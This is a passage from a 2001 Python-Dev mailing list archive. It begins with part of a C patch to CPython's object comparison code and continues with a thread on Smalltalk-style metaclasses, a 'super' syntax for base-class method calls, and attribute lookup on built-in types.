*/ + +static PyObject * +_PyNumber_OldstyleCompare(PyObject *v, + PyObject *w) +{ + int err; + + DPRINTF("_PyNumber_OldstyleCompare(%s at 0x%lx, %s at 0x%lx);\n", + v->ob_type->tp_name,(long)v, + w->ob_type->tp_name,(long)w); + err = PyNumber_CoerceEx(&v, &w); + if (err < 0) + return NULL; + else if (err == 0 && v->ob_type->tp_compare) { + int cmp; + + cmp = (*v->ob_type->tp_compare)(v, w); + /* XXX Test for errors ? Looks like C types cannot raise + exceptions in the compare slot... */ + Py_DECREF(v); + Py_DECREF(w); + DPRINTF(" compare slot returned: %i",cmp); + return PyInt_FromLong(cmp); + } + DPRINTF(" using type names for comparison\n"); + return PyInt_FromLong(strcmp(v->ob_type->tp_name, + w->ob_type->tp_name)); +} + +PyObject * +PyNumber_Compare(v, w) + PyObject *v, *w; +{ + DPRINTF("PyNumber_Compare(%s at 0x%lx, %s at 0x%lx);\n", + v->ob_type->tp_name,(long)v, + w->ob_type->tp_name,(long)w); + BINOP("__cmp__", "__rcmp__", PyNumber_Compare); + return _PyNumber_BinaryOperation(v,w, + NB_SLOT(nb_cmp), + "cmp()"); +} + [...] +static PyObject * +_PyNumber_BinaryOperation(PyObject *v, + PyObject *w, + const int op_slot, + const char *operation) +{ + PyNumberMethods *mv, *mw; + register PyObject *x; + register binaryfunc *slot; + int c; ... + /* When using old coercion, make sure that the requested slot + is available on old style numbers or use an emulation. */ + if (op_slot > NB_SLOT(nb_hex)) { + + /* Emulation hooks: */ + if (op_slot == NB_SLOT(nb_cmp)) + return _PyNumber_OldstyleCompare(v,w); + + goto badOperands; + } [...] int PyObject_Compare(v, w) PyObject *v, *w; { PyTypeObject *tp; @@ -291,27 +294,30 @@ PyObject_Compare(v, w) Py_DECREF(res); PyErr_SetString(PyExc_TypeError, "comparison did not return an int"); return -1; } - c = PyInt_AsLong(res); + c = PyInt_AS_LONG(res); Py_DECREF(res); return (c < 0) ? -1 : (c > 0) ? 
1 : 0; } if ((tp = v->ob_type) != w->ob_type) { - if (tp->tp_as_number != NULL && - w->ob_type->tp_as_number != NULL) { - int err; - err = PyNumber_CoerceEx(&v, &w); - if (err < 0) + if (tp->tp_as_number != NULL || + w->ob_type->tp_as_number != NULL) { + PyObject *res; + int c; + res = PyNumber_Compare(v,w); + if (res == NULL) return -1; - else if (err == 0) { - int cmp = (*v->ob_type->tp_compare)(v, w); - Py_DECREF(v); - Py_DECREF(w); - return cmp; + if (!PyInt_Check(res)) { + PyErr_SetString(PyExc_TypeError, + "comparison did not return an int"); + return -1; } + c = PyInt_AS_LONG(res); + Py_DECREF(res); + return (c < 0) ? -1 : (c > 0) ? 1 : 0; } return strcmp(tp->tp_name, w->ob_type->tp_name); } if (tp->tp_compare == NULL) return (v < w) ? -1 : 1; -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal@lemburg.com Wed May 2 10:09:17 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Wed, 02 May 2001 11:09:17 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020052.TAA24315@cj20424-a.reston1.va.home.com> Message-ID: <3AEFCEBD.2E5979C9@lemburg.com> Guido van Rossum wrote: > > While implementing more class-like behavior for built-in types in the > experimental descr-branch in the 2.2 CVS tree, I've noticed problems > caused by Python's collapsing of class attributes and instance > attributes. > > For example, suppose d is a dictionary. My experimental changes make > d.__class__ return DictType (from the types module). > (DictType.__class__ is TypeType, by the way.) I also added special > methods. For example, d.__repr__() now returns repr(d). I am > preparing for subclassing of built-in types, so I will eventually be > able to derive a class MyDictType from DictType, as follows: > > class MyDictType(DictType): > ... > > Now comes the fun part. 
Suppose MyDictType wants to define its own > repr(): > > class MyDictType(DictType): > def __repr__(self): > return "MyDictType(%s)" % DictType.__repr__(self) > > But, (surprise, surprise!), DictType itself also has a __repr__() > method: it returns the string "". > > So the above code would fail: DictType.__repr__() returns > repr(DictType), and DictType.__repr__(self) raises an argument count > error. The correct __repr__ method for dictionary objects can be > found as DictType.__dict__['__repr__'], but that looks hideous! > > What to do? Pragmatically, I can make DictType.__repr__ return > DictType.__dict__['__repr__'], and all will be well in this example. > But we have to tread carefully here: DictType.__class__ is TypeType, > but DictType.__dict__['__class__'] is a descriptor for the __class__ > attribute on dictionary objects. > > The best rule I can think of so far is that DictType.__dict__ gives > the *true* set of attribute descriptors for dictionary objects, and is > thus similar to Smalltalks's class.methodDict that Jim describes > below. DictType.foo is a shortcut that can resolve to either > DictType.__dict__['foo'] or to an attribute (maybe a method) of > DictType described in TypeType.__dict__['foo'], whichever is defined. > If both are defined, I propose the following, clumsy but backwards > compatible rule: if DictType.__dict__['foo'] describes a method, it > wins. Otherwise, TypeType.__dict__['foo'] wins. I'm not sure I can follow you here: DictType.__repr__ is the representation method of the dictionary and not inherited from TypeType, so there should be no problem. The problem with the misleading error message would only show up in case DictType does not define a __repr__ method. Then the inherited one from TypeType would come into play and cause the problem you mention above. Thinking in terms of meta-classes, I believe we should implement this mechanism in the meta-class (TypeType in this case). 
Its __getattr__() will have to decide whether or not to expose its own methods and attributes or not. The only catch here is that currently instances and classes have control of whether and how to bind found functions as methods or not. We should probably change that to pass complete control over to the meta-class object and remove the special control flows currently found in instance_getattr2() and class_lookup(). In general, I think that meta-classes should not expose their attributes to the class objects they create, since this causes way too many problems. Perhaps I'm oversimplifying things here, but I have a feeling that we can go a long way by actually trying to see meta-classes as first class members in the interpreter design and moving all the binding and lookup mechanisms over to this object type. The special casing should then take place in the meta-class rather than its creations. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From thomas.heller@ion-tof.com Wed May 2 11:57:42 2001 From: thomas.heller@ion-tof.com (Thomas Heller) Date: Wed, 2 May 2001 12:57:42 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> Message-ID: <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> > > The most common use for these seems to be for calling > > inherited methods, so perhaps something like > > > > inherited MyBaseClass.foo(arg, ...) > > > > which would be equivalent to > > > > getmethod(MyBaseClass, 'foo')(self, arg, ...) > > > > where getmethod() is a new builtin like getattr() > > except that it looks in the __classdict__, and 'self' > > is really whatever the first argument of the containing > > method was. > > The second most common use is to reference class variables > (e.g.
imagine a class that keeps counters of how many instances have > been created and deleted in C.initcount and C.delcount). But these > should not have to change, since they really are class attributes. > > > Now that we have __future__, would such a change be contemplatable? > > Or is it too radical to even think about? > > If we can find a way to spell "super.method", we should be ready for > the future. I can't think of something right off the bat > unfortunately. Could we make super(self, MyBaseClass).foo(arg, ...) behave similar to MyBaseClass.foo(self, arg, ...) Wrapping this stuff in a function would probably also enable to use the same pattern in existing python versions. Thomas From thomas.heller@ion-tof.com Wed May 2 12:12:21 2001 From: thomas.heller@ion-tof.com (Thomas Heller) Date: Wed, 2 May 2001 13:12:21 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020052.TAA24315@cj20424-a.reston1.va.home.com> Message-ID: <03d301c0d2f8$c29d3960$e000a8c0@thomasnotebook> > Jim Althoff (a big commercial user of J[P]ython) sent me a summary of > how metaclasses work in Smalltalk. He should know, since he invented > them! :-) I include it below, with his permission. I found this very interesting reading. [From Jim Althoff] > In the list below, indentation indicates class hierarchy (superclass -- > subclass) The indentation, unfortunately, seems to be destroyed. > > plain-class > ---------------- > > o Class > o Object isInstanceOf > o ObjectMetaClass isInstanceOf MetaClass > o Class isInstanceOf > o ClassMetaClass isInstanceOf MetaClass > o MetaClass isInstanceOf > o MetaClassMetaClass isInstanceOf MetaClass > . . . > o Rectangle isInstanceOf > o RectangleMetaClass isInstanceOf MetaClass > o SpecializedRectangle isInstanceOf > o SpecializedRectangleMetaClass isInstanceOf MetaClass A question for Jim (this is more Smalltalk than Python related): How does the Behaviour class fit into this picture?
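To relate Jim's list to Python, here is a rough sketch in modern Python 3 syntax (which post-dates this thread) of the same parallel structure: each class gets its own metaclass, and the metaclass hierarchy mirrors the class hierarchy. The class names follow Jim's list. The `describe` class-side method is hypothetical; it only shows that behaviour defined on a metaclass is inherited along the metaclass chain and is not visible on instances.

```python
# Sketch: mirror the Smalltalk class/metaclass hierarchy in Python 3.
# Each class has its own metaclass, and the metaclasses form a parallel
# hierarchy (RectangleMetaClass -> SpecializedRectangleMetaClass).


class RectangleMetaClass(type):
    """Class-side behaviour for Rectangle (Smalltalk's 'class methods')."""

    def describe(cls):
        # Hypothetical class-side method, inherited along the metaclass chain.
        return f"{cls.__name__} (instance of {type(cls).__name__})"


class SpecializedRectangleMetaClass(RectangleMetaClass):
    """Metaclass of SpecializedRectangle; subclasses Rectangle's metaclass."""


class Rectangle(metaclass=RectangleMetaClass):
    pass


class SpecializedRectangle(Rectangle, metaclass=SpecializedRectangleMetaClass):
    pass


if __name__ == "__main__":
    print(SpecializedRectangle.describe())
    # prints: SpecializedRectangle (instance of SpecializedRectangleMetaClass)
```

One difference from Jim's list: Python closes the loop with `type(type) is type`, whereas in Smalltalk MetaClass has its own metaclass (MetaClassMetaClass), which in turn is an instance of MetaClass.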
Thomas From guido@digicool.com Wed May 2 13:15:57 2001 From: guido@digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 07:15:57 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Wed, 02 May 2001 12:57:42 +0200." <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> Message-ID: <200105021215.HAA31939@cj20424-a.reston1.va.home.com> > > If we can find a way to spell "super.method", we should be ready for > > the future. I can't think of something right off the bat > > unfortunately. > > Could we make > > super(self, MyBaseClass).foo(arg, ...) > > behave similar to > > MyBaseClass.foo(self, arg, ...) > > Wrapping this stuff in a function would probably also > enable to use the same pattern in existing python versions. Yes, I can see how to write super() using current tools (or 1.5.2 even). The problem is that this makes super calls even more wordy than they already are! I can't think of anything that wouldn't require compiler support though. --Guido van Rossum (home page: http://www.python.org/~guido/) From gward@python.net Wed May 2 13:57:41 2001 From: gward@python.net (Greg Ward) Date: Wed, 2 May 2001 08:57:41 -0400 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: <200105021215.HAA31939@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Wed, May 02, 2001 at 07:15:57AM -0500 References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> Message-ID: <20010502085741.B515@gerg.ca> On 02 May 2001, Guido van Rossum said: > Yes, I can see how to write super() using current tools (or 1.5.2 > even). The problem is that this makes super calls even more wordy > than they already are!
I can't think of anything that wouldn't > require compiler support though. I was just doing some gedanken with various ways to spell "super", and I think my favourite is the same as Java's (as I remember it): class MyClass (BaseClass): def foo (self, arg1, arg2): super.foo(arg1, arg2) Since I don't know much about Python's guts, I can't say how implementable this is, but I like the spelling. The semantics would be something like this (with adjustments to the reality of Python's guts): * 'super' is a magic object that only makes sense inside a 'def' inside a 'class' (at least for now; perhaps it could be generalized to work at class scope as well as method scope, but let's keep it simple) * super's notional __getattr__() does something like this: - peek at the calling stack frame and fetch the calling function (MyClass.foo) and the first argument to that function (self) - [is this possible?] ensure that calling_function is a bound method, and that it's bound to the self object we just plucked from the stack; raise a "misuse of super object" exception if not - walk the superclass tree starting at self.__class__.__bases__ (ie. skip self's class), looking for an object with the name passed to this __getattr__() call -- 'foo' - when found, return it - if not found, raise AttributeError The ability to peek at the calling stack frame is essential to this scheme, in order to fetch the "current object" (self) without needing to have it explicitly passed. Is this as bothersome from C as it is from Python? Greg -- Greg Ward - nerd gward@python.net http://starship.python.net/~gward/ In space, no one can hear you fart. From mal@lemburg.com Wed May 2 14:07:27 2001 From: mal@lemburg.com (M.-A. 
Lemburg) Date: Wed, 02 May 2001 15:07:27 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> Message-ID: <3AF0068F.32388C87@lemburg.com> Greg Ward wrote: > > On 02 May 2001, Guido van Rossum said: > > Yes, I can see how to write super() using current tools (or 1.5.2 > > even). The problem is that this makes super calls even more wordy > > than they already are! I can't think of anything that wouldn't > > require compiler support though. > > I was just doing some gedanken with various ways to spell "super", and I > think my favourite is the same as Java's (as I remember it): > > class MyClass (BaseClass): > def foo (self, arg1, arg2): > super.foo(arg1, arg2) > > Since I don't know much about Python's guts, I can't say how > implementable this is, but I like the spelling. The semantics would be > something like this (with adjustments to the reality of Python's guts): > ... This doesn't work in Python since Python has multiple inheritence, e.g. super in class A(B,C): def foo(self): super.foo() is ambiguous. I'd rather suggest adding a function for finding the basemethod of a method. This is probably the most common task in this context. 
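As a rough illustration of the "basemethod" lookup suggested above, here is a minimal Python 3 sketch. It assumes classic-class lookup order (depth-first, left to right, ignoring `object`) and resumes the search just after the class that defines the given method. `find_basemethod` and `classic_lookup_order` are hypothetical names for this sketch only; they are not the mx.Tools `basemethod()` API.

```python
def classic_lookup_order(cls):
    """Depth-first, left-to-right class order, as used by pre-2.2 classes.

    `object` is skipped so that Python 3 classes behave like classic ones;
    a class reachable through several bases keeps its first position.
    """
    order = [cls]
    for base in cls.__bases__:
        if base is object:
            continue
        for klass in classic_lookup_order(base):
            if klass not in order:
                order.append(klass)
    return order


def find_basemethod(instance, method):
    """Return the function that `method` overrides for this instance.

    The search resumes right after the class whose __dict__ holds `method`,
    i.e. the lookup "continues" past the overriding definition.
    """
    func = getattr(method, "__func__", method)  # accept bound methods too
    name = func.__name__
    order = classic_lookup_order(type(instance))
    for index, klass in enumerate(order):
        if klass.__dict__.get(name) is func:
            break
    else:
        raise ValueError(f"{name!r} is not defined in {type(instance).__name__}'s hierarchy")
    for klass in order[index + 1:]:
        if name in klass.__dict__:
            return klass.__dict__[name]
    raise AttributeError(f"no base method for {name!r}")


class B:
    def foo(self):
        return "B.foo"


class C:
    def foo(self):
        return "C.foo"


class A(B, C):
    def foo(self):
        # Call the overridden method without naming B explicitly.
        return "A.foo -> " + find_basemethod(self, A.foo)(self)
```

Here `A().foo()` returns `'A.foo -> B.foo'`, while `find_basemethod(A(), B.foo)` resumes after `B` and finds `C.foo`. The returned function is unbound, so it must be called with the instance as its first argument.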
-- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From thomas.heller@ion-tof.com Wed May 2 14:12:40 2001 From: thomas.heller@ion-tof.com (Thomas Heller) Date: Wed, 2 May 2001 15:12:40 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> Message-ID: <049901c0d309$92c515d0$e000a8c0@thomasnotebook> [Greg Ward] > On 02 May 2001, Guido van Rossum said: > > Yes, I can see how to write super() using current tools (or 1.5.2 > > even). The problem is that this makes super calls even more wordy > > than they already are! I can't think of anything that wouldn't > > require compiler support though. > > I was just doing some gedanken with various ways to spell "super", and I > think my favourite is the same as Java's (as I remember it): > > class MyClass (BaseClass): > def foo (self, arg1, arg2): > super.foo(arg1, arg2) > > > Since I don't know much about Python's guts, I can't say how > implementable this is, but I like the spelling. The semantics would be > something like this (with adjustments to the reality of Python's guts): > > * 'super' is a magic object that only makes sense inside a 'def' > inside a 'class' (at least for now; perhaps it could be generalized > to work at class scope as well as method scope, but let's keep > it simple) > > * super's notional __getattr__() does something like this: > - peek at the calling stack frame and fetch the calling function > (MyClass.foo) and the first argument to that function (self) > - [is this possible?] 
ensure that calling_function is a bound > method, and that it's bound to the self object we just plucked > from the stack; raise a "misuse of super object" exception if not > - walk the superclass tree starting at self.__class__.__bases__ Careful! The search in the above context must start at MyClass.__bases__ which may not be the same as self.__class__.__bases__. Thomas From guido@digicool.com Wed May 2 15:29:03 2001 From: guido@digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 09:29:03 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Wed, 02 May 2001 08:57:41 -0400." <20010502085741.B515@gerg.ca> References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> Message-ID: <200105021429.JAA32055@cj20424-a.reston1.va.home.com> [Greg Ward, welcome back!] > I was just doing some gedanken with various ways to spell "super", and I > think my favourite is the same as Java's (as I remember it): > > class MyClass (BaseClass): > def foo (self, arg1, arg2): > super.foo(arg1, arg2) I'm sure that's everybody's favorite way to spell it! It's mine too. :-) > Since I don't know much about Python's guts, I can't say how > implementable this is, but I like the spelling. The semantics would be > something like this (with adjustments to the reality of Python's guts): > > * 'super' is a magic object that only makes sense inside a 'def' > inside a 'class' (at least for now; perhaps it could be generalized > to work at class scope as well as method scope, but let's keep > it simple) Yes, that's about the only way it can be made to work. The compiler will have to (1) detect that 'super' is a free variable, and (2) make it a local and initialize it with the proper magic.
Or, to relieve the burden from the symbol table, we could make super a keyword, at the cost of breaking existing code. I don't think super is needed outside methods. > * super's notional __getattr__() does something like this: > - peek at the calling stack frame and fetch the calling function > (MyClass.foo) and the first argument to that function (self) > - [is this possible?] ensure that calling_function is a bound > method, and that it's bound to the self object we just plucked > from the stack; raise a "misuse of super object" exception if not I don't think you can make that test, but making it a 'magic local' as I suggested above would avoid the problem. > - walk the superclass tree starting at self.__class__.__bases__ > (ie. skip self's class), looking for an object with the name > passed to this __getattr__() call -- 'foo' > - when found, return it > - if not found, raise AttributeError Yup, that's the easy part. :-) > The ability to peek at the calling stack frame is essential to this > scheme, in order to fetch the "current object" (self) without needing to > have it explicitly passed. Is this as bothersome from C as it is from > Python? No, in C it's easy. The problem is that there is no information in the frame that tells you where the currently executing function was defined -- all you have is the code object, which is context-independent. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido@digicool.com Wed May 2 15:30:20 2001 From: guido@digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 09:30:20 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Wed, 02 May 2001 15:07:27 +0200." 
<3AF0068F.32388C87@lemburg.com> References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <3AF0068F.32388C87@lemburg.com> Message-ID: <200105021430.JAA32075@cj20424-a.reston1.va.home.com> > This doesn't work in Python since Python has multiple inheritence, > e.g. super in > > class A(B,C): > def foo(self): > super.foo() > > is ambiguous. I'm not sure what you mean. The search is totally well-defined: first search B for a foo method, then search C. > I'd rather suggest adding a function for finding the basemethod > of a method. This is probably the most common task in this context. I've never heard of the concept of basemethod, but if I may venture a guess, it would be the same definition as I give above. --Guido van Rossum (home page: http://www.python.org/~guido/) From jeremy@digicool.com Wed May 2 14:38:42 2001 From: jeremy@digicool.com (Jeremy Hylton) Date: Wed, 2 May 2001 09:38:42 -0400 (EDT) Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: <200105021429.JAA32055@cj20424-a.reston1.va.home.com> References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> Message-ID: <15088.3554.953359.757584@slothrop.digicool.com> >>>>> "GvR" == Guido van Rossum writes: >> Since I don't know much about Python's guts, I can't say how >> implementable this is, but I like the spelling. 
The semantics >> would be something like this (with adjustments to the reality of >> Python's guts): >> >> * 'super' is a magic object that only makes sense inside a 'def' >> inside a 'class' (at least for now; perhaps it could be >> generalized to work at class scope as well as method scope, but >> let's keep it simple) GvR> Yes, that's about the only way it can be made to work. The GvR> compiler will have to (1) detect that 'super' is a free GvR> variable, and (2) make it a local and initialize it with the GvR> proper magic. Or, to relieve the burden from the symbol table, GvR> we could make super a keyword, at the cost of breaking existing GvR> code. GvR> I don't think super is needed outside methods. It seems helpful to clarify here, since this came up in conversation at PythonLabs just the other day with the yield statement. If we try to avoid keywords, we have to take the "well, I don't see anyone assigning to this name" route. If the compiler does not detect any assignment to a nearly reserved word, like super, it would give the use of that word special meaning. There are a bunch of little problems. A module could (not necessarily should) be designed to have a global name poked into its namespace; this would break, because the name would already have transmogrified from a regular variable into a special one. The use of exec or import star would make it impossible for the word to take on its special meaning. So keywords really are a lot clearer, but they have the potential to be incompatible. 
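Jeremy's "well, I don't see anyone assigning to this name" route can be approximated with today's `ast` module. The sketch below is hypothetical and is not how CPython's compiler works. As Jeremy notes, no such check can see a name poked into a module's namespace from outside, so the function simply gives up (returns False) when it meets `import *` or a call to `exec`. The list of binding forms is illustrative rather than exhaustive (for example, match-statement captures are ignored).

```python
import ast


def name_is_never_bound(source, name="super"):
    """Return True if `source` never binds `name`, so that a compiler could
    safely give it a special meaning.

    Returns False on anything that might bind it: assignment or deletion,
    def/class statements, parameters, except-clause targets, imports,
    `import *`, or a call to exec().
    """
    tree = ast.parse(source)
    for node in ast.walk(tree):
        if isinstance(node, ast.Name) and node.id == name and not isinstance(node.ctx, ast.Load):
            return False  # assignment, augmented assignment, for/with target, del
        if isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef, ast.ClassDef)) and node.name == name:
            return False
        if isinstance(node, ast.arg) and node.arg == name:
            return False  # used as a parameter name
        if isinstance(node, ast.ExceptHandler) and node.name == name:
            return False  # "except E as super:"
        if isinstance(node, (ast.Import, ast.ImportFrom)):
            for alias in node.names:
                if alias.name == "*":
                    return False  # cannot know which names a star import binds
                if (alias.asname or alias.name.split(".")[0]) == name:
                    return False
        if isinstance(node, ast.Call) and isinstance(node.func, ast.Name) and node.func.id == "exec":
            return False  # exec() may bind arbitrary names at run time
    return True
```

The trade-off Jeremy describes shows up directly: the heuristic has to be conservative, so a single star import anywhere in a module would silently turn off the special meaning of the name.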
Jeremy From fredrik@pythonware.com Wed May 2 15:00:55 2001 From: fredrik@pythonware.com (Fredrik Lundh) Date: Wed, 2 May 2001 16:00:55 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> Message-ID: <000d01c0d310$4ee127d0$0900a8c0@spiff> guido wrote: > > class MyClass (BaseClass): > > def foo (self, arg1, arg2): > > super.foo(arg1, arg2) > > I'm sure that's everybody's favorite way to spell it! not mine. my brain contains far too much Python 1.5.2 code for it to accept that some variables are dynamically scoped, while others are lexically scoped. why not spell it out: self.__super__.foo(arg1, arg2) or self.super.foo(arg1, arg2) or super(self).foo(arg1, arg2) > Or, to relieve the burden from the symbol table, we could make super > a keyword, at the cost of breaking existing code. hey, how about introducing $ as a keyword prefix for newly introduced keywords? $super.foo(arg1, arg2) (this can of course be mapped to either of my previous suggestions; "$foo" either means "self.foo" or "foo(self)"...) and to save a little typing, only use it for keywords that start with an "s" (should leave us plenty of expansion room): $uper.foo(arg1, arg2) otoh, if "super" is common enough to motivate introducing magic objects into python, maybe "$" should mean "super."? $foo(arg1, arg2) and while we're at it, let's introduce "@" for "self.". gotta run -- time for my monthly reboot /F From guido@digicool.com Wed May 2 16:03:37 2001 From: guido@digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 10:03:37 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Wed, 02 May 2001 11:09:17 +0200." 
<3AEFCEBD.2E5979C9@lemburg.com> References: <200105020052.TAA24315@cj20424-a.reston1.va.home.com> <3AEFCEBD.2E5979C9@lemburg.com> Message-ID: <200105021503.KAA32203@cj20424-a.reston1.va.home.com> [me] > > The best rule I can think of so far is that DictType.__dict__ gives > > the *true* set of attribute descriptors for dictionary objects, and is > > thus similar to Smalltalks's class.methodDict that Jim describes > > below. DictType.foo is a shortcut that can resolve to either > > DictType.__dict__['foo'] or to an attribute (maybe a method) of > > DictType described in TypeType.__dict__['foo'], whichever is defined. > > If both are defined, I propose the following, clumsy but backwards > > compatible rule: if DictType.__dict__['foo'] describes a method, it > > wins. Otherwise, TypeType.__dict__['foo'] wins. [MAL] > I'm not sure I can follow you here: DictType.__repr__ is the > representation method of the dictionary and not inherited > from TypeType, so there should be no problem. The problem is that both a dictionary object (call it d) and its type (DictType) have a __repr__ method: repr(d) returns "d", and repr(DictType) returns "". 
Given the analogy with classes, where str(x) invokes x.__str__() and x.__str__() can also be called directly, it is not unreasonable to expect that this works in general, so that repr(d) can be spelled as d.__repr__() and repr(DictType) as DictType.__repr__() And, given another analogy with classes, where x.foo() is equivalent to x.__class__.foo(x), the two forms above should also be equivalent to d.__class__.__repr__(d) and DictType.__class__.__repr__(DictType) But since d.__class__ is DictType, we now have two conflicting ways to derive a meaning for DictType.__repr__: the first one going repr(DictType) => DictType.__repr__() and the second one going repr(d) => d.__class__.__repr__(d) => DictType.__repr__(d) The rule quoted above chooses the second meaning, from the very pragmatic point that once I allow subclassing from DictType, such a subclass might very well want to override __repr__ to wrap the base class __repr__, and the conventional way to reference that (barring the implementation of 'super') is DictType.__repr__. Direct invocation of an object's own __repr__ method as x.__repr__() is much less common. The implementation of repr(x) can do the right thing, which is to look for x.__class__.__dict__['__repr__']. > The problem with the misleading error message would only show > up in case DictType does not define a __repr__ method. Then the > inherited one from TypeType would come into play and cause > the problem you mention above. No, the issue is not inheritance: I haven't implemented inheritance yet. DictType is an instance of TypeType but doesn't inherit from it. > Thinking in terms of meta-classes, I believe we should implement > this mechanism in the meta-class (TypeType in this case). Its > __getattr__() will have to decide whether or not to expose its > own methods and attributes or not. That's exactly how I solved it: type_getattro() implements the rule quoted at the top.
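The rule quoted at the top (the type's own `__dict__` wins when its entry describes a method; otherwise the metatype's attribute wins) can be modelled in pure Python. This is a hypothetical sketch, not `type_getattro()` itself. Like the experimental branch, it looks only at the class's own `__dict__` (no inheritance), and it uses modern Python 3, where `dict.__dict__['__repr__']` is a slot-wrapper descriptor. Which descriptor kinds count as "describing a method" is an assumption of the sketch.

```python
import types

_MISSING = object()

# Descriptor kinds treated as "describing a method" for instances of the type.
_METHOD_KINDS = (
    types.FunctionType,            # methods written in Python
    types.WrapperDescriptorType,   # C slots such as dict.__dict__['__repr__']
    types.MethodDescriptorType,    # C methods such as dict.__dict__['keys']
)


def resolve_type_attribute(cls, name):
    """Resolve cls.<name> following the rule proposed in the thread."""
    own = cls.__dict__.get(name, _MISSING)         # descriptor for instances
    meta = type(cls).__dict__.get(name, _MISSING)  # attribute of the type itself

    # The type's own entry wins if it is the only candidate or describes a method.
    if own is not _MISSING and (meta is _MISSING or isinstance(own, _METHOD_KINDS)):
        return own
    if meta is not _MISSING:
        # Bind the metatype's attribute to cls, the way attribute access would.
        if hasattr(meta, "__get__"):
            return meta.__get__(cls, type(cls))
        return meta
    raise AttributeError(name)
```

With this rule, `resolve_type_attribute(dict, "__repr__")(d)` gives `repr(d)`, which is what a subclass wrapping the base-class `__repr__` needs. The type's own repr remains reachable through the metatype, as `type(dict).__dict__["__repr__"](dict)`.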
> The only catch here is that currently instances and classes have > control of whether and how to bind found functions as methods or not. > We should probably change that to pass complete control over to the > meta-class object and remove the special control flows currently found > in instance_getattr2() and class_lookup(). Um, yeah, that's where I think this will end up causing more trouble. Right now, if x is an instance, some attributes like x.__class__ and x.__dict__ are special-cased in instance_getattr(). The mechanism I propose removes the need for (most of) such special cases, and instead allows the class to provide "descriptors" for instance attributes. So, for example, if instances of a class C have an attribute named foo, C.__dict__['foo'] contains the descriptor for that attribute, and that is how the implementation decides how to interpret x.foo (assuming x is an instance of C). We may be able to access this same descriptor as C.foo, but that's really only important for backwards compatibility with the way classes work today. > In general, I think that meta-classes should not expose their > attributes to the class objects they create, since this causes > way too many problems. I agree. > Perhaps I'm oversimplifying things here, but I have a feeling that > we can go a long way by actually trying to see meta-classes as > first class members in the interpreter design and moving all the > binding and lookup mechanisms over to this object type. The special > casing should then take place in the meta-class rather than its > creations. Yes, that's where I'm heading! --Guido van Rossum (home page: http://www.python.org/~guido/) From mal@lemburg.com Wed May 2 15:02:41 2001 From: mal@lemburg.com (M.-A.
